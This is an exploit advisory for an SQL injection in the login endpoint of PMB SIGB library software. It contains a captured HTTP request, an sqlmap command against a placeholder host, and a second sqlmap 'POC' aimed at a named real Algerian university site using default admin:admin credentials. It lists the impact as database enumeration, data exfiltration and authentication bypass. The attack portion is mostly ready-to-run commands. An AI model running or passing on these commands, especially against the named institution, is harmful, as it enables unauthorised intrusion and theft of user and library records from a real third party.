Exploit Title: PMB SIGB 7.x - SQL Injection Date: 12-26-2025 Location : Algeria 23000 Exploit Author: DZ Mind Injector Vendor Homepage: https://www.sigb.net Software Link: https://forge.sigb.net/projects/pmb Version: <= 7.5.8 Tested on: PMB 7.x CVE: N/A Category: webapps Vulnerability Summary PMB SIGB main.php login endpoint is vulnerable to SQL Injection in the database parameter. The application fails to sanitize user-supplied input before including it in a database query during authentication. Vulnerable Request (Captured via Burp Suite) text POST /main.php HTTP/2 Host: target.com Content-Length: 51 Cache-Control: max-age=0 Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Accept-Language: en-US,en;q=0.9 Origin: target.com Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: target.com Accept-Encoding: gzip, deflate, br Priority: u=0, i ret_url=&database=ehec_db&user=admin&password=admin Response (302 Success - No login_error=1): text HTTP/2 302 Found Location: index.php Exploit Command text sqlmap -u "https://target.com/main.php" --data="ret_url=&database=ehec_db&user=admin&password=admin" -p database --batch --dbs --risk=3 --level=5 POC (Real Algerian University Target) text sqlmap -u "https://pmb.univ-guelma.dz/main.php" --data="ret_url=&database=ehec_db&user=admin&password=admin" -p database --batch --dbs --risk=3 --level=5 Technical Details The database parameter is directly concatenated into the SQL query without sanitization: sql SELECT * FROM users WHERE database='$database' AND user='$user' AND password='$password' Impact Database enumeration (--dbs) Table/column extraction Data exfiltration (users, passwords, library records) Potential authentication bypass Combined with default admin:admin = full admin access Remediation Upgrade to PMB >= 8.0.1.2